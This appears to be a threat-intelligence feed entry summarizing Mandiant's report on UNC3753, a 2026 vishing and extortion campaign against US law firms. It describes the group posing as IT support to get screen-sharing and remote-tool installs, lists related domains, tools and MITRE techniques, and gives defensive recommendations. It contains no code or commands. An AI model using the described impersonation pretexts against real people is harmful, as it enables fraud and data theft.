Back

UNC3753 Targets US Law Firms in Sophisticated Vishing Campaign

Severity: High (Score: 67.5)

Sources: cloud.google.com, Mandiant

Published: 2026-06-05 · Updated: 2026-06-05

Keywords: campaign, targeted, firms, january, through, mandiant, identified

Summary

From January to May 2026, Mandiant identified a data theft extortion campaign by threat cluster UNC3753, targeting US law firms and financial services. The group employs voice phishing (vishing) and social engineering to gain remote access to corporate environments. Attackers pose as IT support, using pretexts like data migration to initiate screen-sharing sessions. They exfiltrate sensitive data, including legal agreements and personally identifiable information (PII), for extortion. The campaign has been characterized by rapid execution, with attacks completed within a single business day. Some incidents involved physical access to corporate offices by individuals masquerading as IT technicians. The group uses benign email lures to establish trust before making follow-up calls. This campaign has affected dozens of organizations across the professional services sector. Key Points: • UNC3753 employs vishing and social engineering to target US law firms. • Data theft and extortion typically involve sensitive legal and financial information. • The entire attack sequence can occur within a single business day.

Detailed Analysis

**Impact** Dozens of organizations across the professional, legal, and financial services sectors in the United States were targeted from January through May 2026. The campaign resulted in the theft of highly sensitive data, including proprietary legal agreements, personally identifiable information (PII), and financial records, which were used for extortion demands. Attacks often completed within a single business day, with data searches and exfiltration occurring in under an hour. Physical access attempts involving impersonation of IT technicians to extract data via USB storage media were also reported. **Technical Details** Initial access was gained through voice phishing (vishing) combined with social engineering, using invoice-themed email lures from actor-controlled consumer email accounts to establish pretexts. Threat actors impersonated internal IT or security personnel, conducting phone calls to employees at all seniority levels to initiate screen-sharing sessions and remote monitoring and management (RMM) tool installations such as AnyDesk, Bomgar, Zoho Assist, and SuperOps RMM. Remote desktop services used included Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. No CVEs or specific malware hashes were disclosed. The attack lifecycle included reconnaissance, initial access, execution, persistence, data collection, and exfiltration, often completed rapidly within hours. **Recommended Response** Prioritize user training to recognize vishing attempts and verify IT support requests through independent channels. Enforce strict policies on remote access tool usage and require multi-factor authentication for all remote sessions. Monitor for unusual installation or execution of RMM tools and screen-sharing applications, and restrict USB device usage to prevent physical data exfiltration. Deploy network and endpoint detection rules to identify anomalous remote access activity and screen-sharing sessions initiated outside normal operational procedures.

Source articles (2)

  • Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms — Mandiant · 2026-06-05
    From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Sile…
  • Targeted Campaign Us Law Firms — cloud.google.com · 2026-06-05
    From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Sile…

Timeline

  • 2026-01-01 — Campaign against US law firms identified: Mandiant reports a targeted data theft campaign by UNC3753 affecting law firms and financial services.
  • 2026-05-31 — Rapid attack execution observed: Mandiant noted that attacks from initial contact to data theft can be completed in under a day.
  • 2026-05-31 — Physical access incidents reported: Threat actors gained access to corporate offices, posing as IT technicians to exfiltrate data directly.

Related entities

  • CHATTY SPIDER (Apt Group)
  • Luna Moth (Ransomware Group)
  • Silent Ransom Group (Ransomware Group)
  • Unc3753 (Campaign)
  • Data Breach (Attack Type)
  • Phishing (Attack Type)
  • United States (Country)
  • business-data-leaks.com (Domain)
  • helpdesk.com (Domain)
  • it.com (Domain)
  • itdesk.com (Domain)
  • privnote.com (Domain)
  • Financial (Industry)
  • Legal (Industry)
  • Professional Services (Industry)
  • T1021 - Remote Services (Mitre Attack)
  • T1059 - Command and Scripting Interpreter (Mitre Attack)
  • T1204 - User Execution (Mitre Attack)
  • T1566 - Phishing (Mitre Attack)
  • T1567 - Exfiltration Over Web Service (Mitre Attack)
  • Citrix (Company)
  • Windows (Platform)
  • Windows 365 (Platform)
  • Bomgar (Platform)
  • Zoom (Platform)
  • AnyDesk (Tool)
  • Curl (Tool)
  • Google Drive (Tool)
  • IManage (Tool)
  • Microsoft Teams (Tool)
  • Microsoft Terminal Services (Tool)
  • OneDrive (Tool)
  • Privnote (Tool)
  • Quick Assist (Tool)
  • RClone (Tool)
  • WinSCP (Tool)
  • Zoho Assist (Tool)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed